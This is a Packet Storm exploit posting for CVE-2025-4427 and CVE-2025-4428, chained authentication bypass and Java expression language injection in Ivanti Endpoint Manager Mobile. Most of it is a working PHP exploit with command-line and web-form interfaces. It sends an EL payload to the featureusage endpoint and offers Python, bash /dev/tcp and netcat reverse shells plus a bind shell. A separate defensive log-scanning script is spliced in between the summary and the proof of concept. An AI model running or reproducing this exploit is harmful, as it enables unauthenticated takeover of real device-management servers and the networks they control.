Ivanti Endpoint Manager Mobile 12.5.0.0 Expression Language Injection

Published 17 Dec 2025. Reported by indoushka. Source: packetstorm (packetstorm.news).

Ivanti Endpoint Manager Mobile 12.5.0.0 has authentication bypass and Java expression language injection.

=============================================================================================================================================
    | # Title     : Ivanti Endpoint Manager Mobile 12.5.0.0 Expression Language Injection                                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.ivanti.com/products/endpoint-manager-mobile                                                                     |
    =============================================================================================================================================
    
    [+] References :  https://packetstorm.news/files/id/200146/ &  CVE-2025-4427, CVE-2025-4428 
    
    [+] Summary :

        The exploit targets two critical vulnerabilities in Ivanti EPMM:
        CVE-2025-4427 - Authentication Bypass
        CVE-2025-4428 - Expression Language Injection
        Chained together, they allow unauthenticated attackers to execute arbitrary commands
        on the target system through Java Expression Language (EL) injection in the /mifs/rs/api/v2/featureusage endpoint.

    [+] Exploitation Mechanism

        Endpoint Discovery: The exploit targets /mifs/rs/api/v2/featureusage
        Payload Injection: Uses Java EL injection via the format parameter
        Command Execution: Leverages Java runtime reflection to execute system commands
        Result Extraction: Uses the Java Scanner class to read command output
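    The mechanism above gives a defender a precise request shape to hunt for: a GET to /mifs/rs/api/v2/featureusage whose format parameter carries an EL expression rather than a plain format keyword. The following script is an added example (not part of the published PoC or of Ivanti's code) that scans Common Log Format access-log lines for that shape, scoring a bare ${...} lower than one that also carries the reflection calls named in the summary, and decoding the parameter a second time so double-URL-encoded payloads are not missed. The log lines embedded in it are constructed for the example.

```python
"""Detect CVE-2025-4427/4428-style EL injection attempts in web access logs.

Added example for this advisory; not part of the published PoC.
Assumes Common Log Format lines and the endpoint / `format` parameter
described in the advisory. The sample log lines are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

TARGET_PATH = "/mifs/rs/api/v2/featureusage"

# A legitimate `format` value is a short keyword; an EL expression
# delimiter has no business there.
EL_DELIMITER = re.compile(r"[$#]\{")

# Reflection hooks that turn an EL expression into command execution.
REFLECTION_TOKENS = ("getClass()", "forName(", "getRuntime", "exec(", "ProcessBuilder")

# Common Log Format: ip ident user [ts] "METHOD url PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample: benign call, EL payload with reflection calls,
# an unrelated page, and a bare EL expression that produced a 500.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Dec/2025:10:00:01 +0000] "GET /mifs/rs/api/v2/featureusage?format=json HTTP/1.1" 401 0
203.0.113.9 - - [17/Dec/2025:10:00:02 +0000] "GET /mifs/rs/api/v2/featureusage?format=%24%7B%27%27.getClass%28%29.forName%28%27java.lang.Runtime%27%29%7D HTTP/1.1" 200 512
198.51.100.7 - - [17/Dec/2025:10:00:03 +0000] "GET /mifs/login.jsp HTTP/1.1" 200 1024
203.0.113.9 - - [17/Dec/2025:10:00:04 +0000] "GET /mifs/rs/api/v2/featureusage?format=%24%7Bfoo%7D HTTP/1.1" 500 120
"""


def classify_request(url):
    """Return (severity, reason): 0 benign, 1 endpoint hit, 2 EL syntax, 3 EL + reflection."""
    parts = urlsplit(url)
    if not parts.path.startswith(TARGET_PATH):
        return 0, "not the featureusage endpoint"
    params = parse_qs(parts.query, keep_blank_values=True)
    for raw in params.get("format", []):
        # parse_qs already decoded once; decode again so double-encoded
        # payloads (%2524%257B -> %24%7B -> ${) are not missed.
        value = unquote(raw)
        if EL_DELIMITER.search(value):
            hits = [t for t in REFLECTION_TOKENS if t in value]
            if hits:
                return 3, "EL expression with reflection calls %s in format parameter" % hits
            return 2, "EL expression delimiter in format parameter"
    # The endpoint itself is the auth-bypass target, so record plain hits
    # at low severity for correlation with authentication logs.
    return 1, "request to featureusage endpoint"


def scan_log(lines, min_severity=2):
    """Return [(severity, ip, status, reason, url)] for lines at or above min_severity."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format; skip rather than guess
        severity, reason = classify_request(m.group("url"))
        if severity >= min_severity:
            findings.append((severity, m.group("ip"), int(m.group("status")), reason, m.group("url")))
    return findings


if __name__ == "__main__":
    for sev, ip, status, reason, url in scan_log(SAMPLE_LOG.splitlines()):
        print(f"[sev {sev}] {ip} status={status} {reason}\n    {url}")
```

    Run against real logs by feeding the file's lines to scan_log; the HTTP status on a flagged line matters, since a 200 on an injection attempt means the expression was evaluated while a 500 usually means it was rejected or malformed. Lowering min_severity to 1 also lists plain unauthenticated hits on the endpoint, which is the authentication-bypass half of the chain and worth correlating with login records.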
    [+] POC :
    
    php poc.php  or http://127.0.0.1/poc.php 
    
    php poc.php -t target.com -c
    
    php poc.php -t 192.168.1.100 -P command
    
    php poc.php -t target.com -P reverse_shell -H YOUR_IP -L 4444
    
    <?php
    /*
     * by indoushka
     * CVE-2025-4427, CVE-2025-4428 - Ivanti EPMM RCE Exploit
     */
    
    class IvantiEPMMExploit {
        private $target;
        private $port;
        private $ssl;
        private $base_path;
        private $timeout;
        
        public function __construct($target, $port = 443, $ssl = true, $base_path = '/') {
            $this->target = $target;
            $this->port = $port;
            $this->ssl = $ssl;
            $this->base_path = rtrim($base_path, '/');
            $this->timeout = 30;
        }
        
        /**
         * Vulnerability check
         */
        public function check() {
            echo "[*] Checking Ivanti EPMM vulnerability...\n";
            
            $command = 'id';
            $response = $this->execute_command($command);
            
            if (!$response) {
                echo "[-] Failed to get response from target\n";
                return "unknown";
            }
            
            if (strpos($response, 'uid=') !== false && strpos($response, 'gid=') !== false) {
                echo "[+] ✓ Target is vulnerable!\n";
                return "vulnerable";
            } else {
                echo "[-] ✗ Target is not vulnerable\n";
                return "safe";
            }
        }
        
        /**
         * Execute remote command
         */
        private function execute_command($command) {
            // Build Expression Language Injection payload
            $payload = $this->build_el_payload($command);
            
            $url = $this->build_url('/mifs/rs/api/v2/featureusage');
            
            $ch = curl_init();
            curl_setopt_array($ch, [
                CURLOPT_URL => $url . '?format=' . urlencode($payload),
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_TIMEOUT => $this->timeout,
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_SSL_VERIFYHOST => false,
                CURLOPT_FOLLOWLOCATION => true,
                CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            ]);
            
            $response = curl_exec($ch);
            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
            
            echo "[*] HTTP Status: $http_code\n";
            
            return $response;
        }
        
        /**
         * Build Expression Language Injection payload
         */
        private function build_el_payload($command) {
            // Java Expression Language Injection for command execution
            $payload = "\${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('{$command}').getInputStream()).useDelimiter('\\\\\\\\A').next()}";
            
            return $payload;
        }
        
        /**
         * Main exploit execution
         */
        public function exploit($payload_type = 'reverse_shell', $lhost = null, $lport = null) {
            echo "[*] Starting Ivanti EPMM exploitation...\n";
            
            // Create payload based on type
            $payload_cmd = $this->generate_payload($payload_type, $lhost, $lport);
            
            if (!$payload_cmd) {
                echo "[-] Failed to generate payload\n";
                return false;
            }
            
            echo "[*] Executing payload...\n";
            $response = $this->execute_command($payload_cmd);
            
            if ($response) {
                echo "[+] ✓ Payload sent successfully\n";
                echo "[*] Check your reverse connection\n";
                return true;
            } else {
                echo "[-] ✗ Failed to execute payload\n";
                return false;
            }
        }
        
        /**
         * Generate different payloads
         */
        private function generate_payload($type, $lhost, $lport) {
            switch ($type) {
                case 'reverse_shell':
                    if (!$lhost || !$lport) {
                        echo "[-] IP and port required for reverse shell\n";
                        return false;
                    }
                    return $this->generate_reverse_shell($lhost, $lport);
                    
                case 'bind_shell':
                    if (!$lport) {
                        echo "[-] Port required for bind shell\n";
                        return false;
                    }
                    return $this->generate_bind_shell($lport);
                    
                case 'command':
                    return 'id; whoami; uname -a; pwd';
                    
                default:
                    return 'id; whoami';
            }
        }
        
        /**
         * Generate reverse shell
         */
        private function generate_reverse_shell($lhost, $lport) {
            // Multiple reverse shells
            $shells = [
                // Python reverse shell
                "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{$lhost}\",{$lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'",
                
                // Bash reverse shell
                "bash -c 'bash -i >& /dev/tcp/{$lhost}/{$lport} 0>&1'",
                
                // Netcat reverse shell
                "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {$lhost} {$lport} >/tmp/f"
            ];
            
            return $shells[0]; // Use Python as default
        }
        
        /**
         * Generate bind shell
         */
        private function generate_bind_shell($lport) {
            return "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"0.0.0.0\",{$lport}));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0); os.dup2(conn.fileno(),1); os.dup2(conn.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'";
        }
        
        /**
         * Build full URL
         */
        private function build_url($path) {
            $protocol = $this->ssl ? 'https' : 'http';
            $full_path = $this->base_path . $path;
            return "{$protocol}://{$this->target}:{$this->port}{$full_path}";
        }
    }
    
    // CLI Interface
    if (php_sapi_name() === 'cli') {
        echo "
        ██╗██╗   ██╗ █████╗ ███╗   ██╗████████╗██╗
        ██║██║   ██║██╔══██╗████╗  ██║╚══██╔══╝██║
        ██║██║   ██║███████║██╔██╗ ██║   ██║   ██║
        ██║╚██╗ ██╔╝██╔══██║██║╚██╗██║   ██║   ██║
        ██║ ╚████╔╝ ██║  ██║██║ ╚████║   ██║   ██║
        ╚═╝  ╚═══╝  ╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝
        
        Ivanti EPMM RCE ExploitPHP Implementation
        
        \n";
        
        $options = getopt("t:p:s:u:c:P:L:H:", [
            "target:",
            "port:",
            "ssl",
            "uri:",
            "check",
            "payload:",
            "lhost:",
            "lport:"
        ]);
        
        $target = $options['t'] ?? $options['target'] ?? null;
        $port = $options['p'] ?? $options['port'] ?? 443;
        $ssl = isset($options['s']) || isset($options['ssl']);
        $base_uri = $options['u'] ?? $options['uri'] ?? '/';
        $check_only = isset($options['c']) || isset($options['check']);
        $payload_type = $options['P'] ?? $options['payload'] ?? 'command';
        $lhost = $options['H'] ?? $options['lhost'] ?? null;
        $lport = $options['L'] ?? $options['lport'] ?? 4444;
        
        if (!$target) {
            echo "Usage: php poc.php [options]\n";
            echo "Options:\n";
            echo "  -t, --target    Target host (required)\n";
            echo "  -p, --port      Target port (default: 443)\n";
            echo "  -s, --ssl       Use SSL (default: true)\n";
            echo "  -u, --uri       Base URI path (default: /)\n";
            echo "  -c, --check     Check only (don't exploit)\n";
            echo "  -P, --payload   Payload type: command, reverse_shell, bind_shell (default: command)\n";
            echo "  -H, --lhost     Listener host for reverse shell\n";
            echo "  -L, --lport     Listener port for reverse shell (default: 4444)\n";
            echo "\nExamples:\n";
            echo "  php poc.php -t 192.168.1.100 -c\n";
            echo "  php poc.php -t target.com -P reverse_shell -H 10.0.0.5 -L 4444\n";
            exit(1);
        }
        
        $exploit = new IvantiEPMMExploit($target, $port, $ssl, $base_uri);
        
        if ($check_only) {
            $result = $exploit->check();
            echo "\n[*] Result: {$result}\n";
        } else {
            if ($exploit->exploit($payload_type, $lhost, $lport)) {
                echo "[+] Exploitation completed successfully\n";
            } else {
                echo "[-] Exploitation failed\n";
            }
        }
        
    } else {
        // Web Interface - FIXED VERSION
        // Check if form was submitted
        $action = $_POST['action'] ?? '';
        
        if ($action === 'check' || $action === 'exploit') {
            $target = $_POST['target'] ?? '';
            $port = $_POST['port'] ?? 443;
            $ssl = isset($_POST['ssl']);
            $base_uri = $_POST['uri'] ?? '/';
            $payload_type = $_POST['payload_type'] ?? 'command';
            $lhost = $_POST['lhost'] ?? '';
            $lport = $_POST['lport'] ?? 4444;
            
            if (empty($target)) {
                echo "<div style='color: red; padding: 10px; border: 1px solid red; margin: 10px;'>Target host is required</div>";
            } else {
                $exploit = new IvantiEPMMExploit($target, $port, $ssl, $base_uri);
                
                ob_start();
                if ($action === 'check') {
                    $exploit->check();
                } else {
                    $exploit->exploit($payload_type, $lhost, $lport);
                }
                $output = ob_get_clean();
                
                echo "<pre style='background: #f4f4f4; padding: 15px; border: 1px solid #ddd; border-radius: 4px;'>$output</pre>";
            }
            
            // Show the form again after execution
            echo '<a href="'.htmlspecialchars($_SERVER['PHP_SELF']).'" style="display: inline-block; padding: 10px 20px; background: #007cba; color: white; text-decoration: none; border-radius: 4px; margin: 10px 0;">Back to Form</a>';
        } else {
            // Display the form
            echo '<!DOCTYPE html>
            <html>
            <head>
                <title>Ivanti EPMM RCE Exploit</title>
                <meta charset="UTF-8">
                <style>
                    body { 
                        font-family: Arial, sans-serif; 
                        margin: 0; 
                        padding: 20px; 
                        background: #f5f5f5;
                    }
                    .container { 
                        max-width: 800px; 
                        margin: 0 auto; 
                        background: white;
                        padding: 30px;
                        border-radius: 8px;
                        box-shadow: 0 2px 10px rgba(0,0,0,0.1);
                    }
                    h1 { 
                        color: #333; 
                        border-bottom: 2px solid #007cba;
                        padding-bottom: 10px;
                    }
                    h3 {
                        color: #666;
                    }
                    .form-group { 
                        margin-bottom: 20px; 
                    }
                    label { 
                        display: block; 
                        margin-bottom: 8px; 
                        font-weight: bold;
                        color: #333;
                    }
                    input[type="text"], select { 
                        width: 100%; 
                        padding: 10px; 
                        border: 1px solid #ddd; 
                        border-radius: 4px; 
                        box-sizing: border-box;
                        font-size: 14px;
                    }
                    .checkbox-group {
                        display: flex;
                        align-items: center;
                        gap: 10px;
                    }
                    button { 
                        background: #007cba; 
                        color: white; 
                        padding: 12px 25px; 
                        border: none; 
                        border-radius: 4px; 
                        cursor: pointer; 
                        margin-right: 10px;
                        font-size: 16px;
                        transition: background 0.3s;
                    }
                    button:hover {
                        background: #005a87;
                    }
                    .danger { 
                        background: #dc3545; 
                    }
                    .danger:hover {
                        background: #c82333;
                    }
                    .info { 
                        background: #17a2b8; 
                    }
                    .info:hover {
                        background: #138496;
                    }
                    .warning-box {
                        background: #fff3cd;
                        border: 1px solid #ffeaa7;
                        color: #856404;
                        padding: 15px;
                        border-radius: 4px;
                        margin: 20px 0;
                    }
                    .info-box {
                        background: #d1ecf1;
                        border: 1px solid #bee5eb;
                        color: #0c5460;
                        padding: 15px;
                        border-radius: 4px;
                        margin: 20px 0;
                    }
                </style>
            </head>
            <body>
                <div class="container">
                    <h1>Ivanti EPMM RCE Exploit</h1>
                    <h3>CVE-2025-4427 & CVE-2025-4428 - Authentication Bypass & RCE</h3>
                    
                    <div class="warning-box">
                        <strong>⚠️ Warning:</strong> This tool is for educational and authorized penetration testing purposes only. Unauthorized use is illegal.
                    </div>
                    
                    <form method="post">
                        <div class="form-group">
                            <label for="target">Target Host:</label>
                            <input type="text" id="target" name="target" placeholder="192.168.1.100 or target.com" required>
                        </div>
                        
                        <div class="form-group">
                            <label for="port">Port:</label>
                            <input type="text" id="port" name="port" value="443">
                        </div>
                        
                        <div class="form-group">
                            <label for="uri">Base URI:</label>
                            <input type="text" id="uri" name="uri" value="/">
                        </div>
                        
                        <div class="form-group">
                            <div class="checkbox-group">
                                <input type="checkbox" id="ssl" name="ssl" checked>
                                <label for="ssl" style="display: inline; font-weight: normal;">Use SSL</label>
                            </div>
                        </div>
                        
                        <div class="form-group">
                            <label for="payload_type">Payload Type:</label>
                            <select id="payload_type" name="payload_type">
                                <option value="command">Test Command (id; whoami)</option>
                                <option value="reverse_shell">Reverse Shell</option>
                                <option value="bind_shell">Bind Shell</option>
                            </select>
                        </div>
                        
                        <div class="form-group">
                            <label for="lhost">Listener Host (for reverse shell):</label>
                            <input type="text" id="lhost" name="lhost" placeholder="Your IP address: 192.168.1.100">
                        </div>
                        
                        <div class="form-group">
                            <label for="lport">Listener Port (for reverse shell):</label>
                            <input type="text" id="lport" name="lport" value="4444">
                        </div>
                        
                        <button type="submit" name="action" value="check" class="info">Check Vulnerability</button>
                        <button type="submit" name="action" value="exploit" class="danger">Execute Exploit</button>
                    </form>
                    
                    <div class="info-box">
                        <h3>About CVE-2025-4427 & CVE-2025-4428:</h3>
                        <p><strong>Vulnerability:</strong> Authentication Bypass + Expression Language Injection</p>
                        <p><strong>Affected Products:</strong> Ivanti EPMM, MobileIron Core</p>
                        <p><strong>Impact:</strong> Unauthenticated Remote Code Execution</p>
                        <p><strong>Endpoint:</strong> /mifs/rs/api/v2/featureusage</p>
                        <p><strong>CVSS Score:</strong> 9.8 (Critical)</p>
                    </div>
                </div>
            </body>
            </html>';
        }
    }
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Vulners rating (17 Dec 2025): AI Score 8.1 (High risk); CVSS 3.1: 7.2 - 8.8; EPSS: 0.91261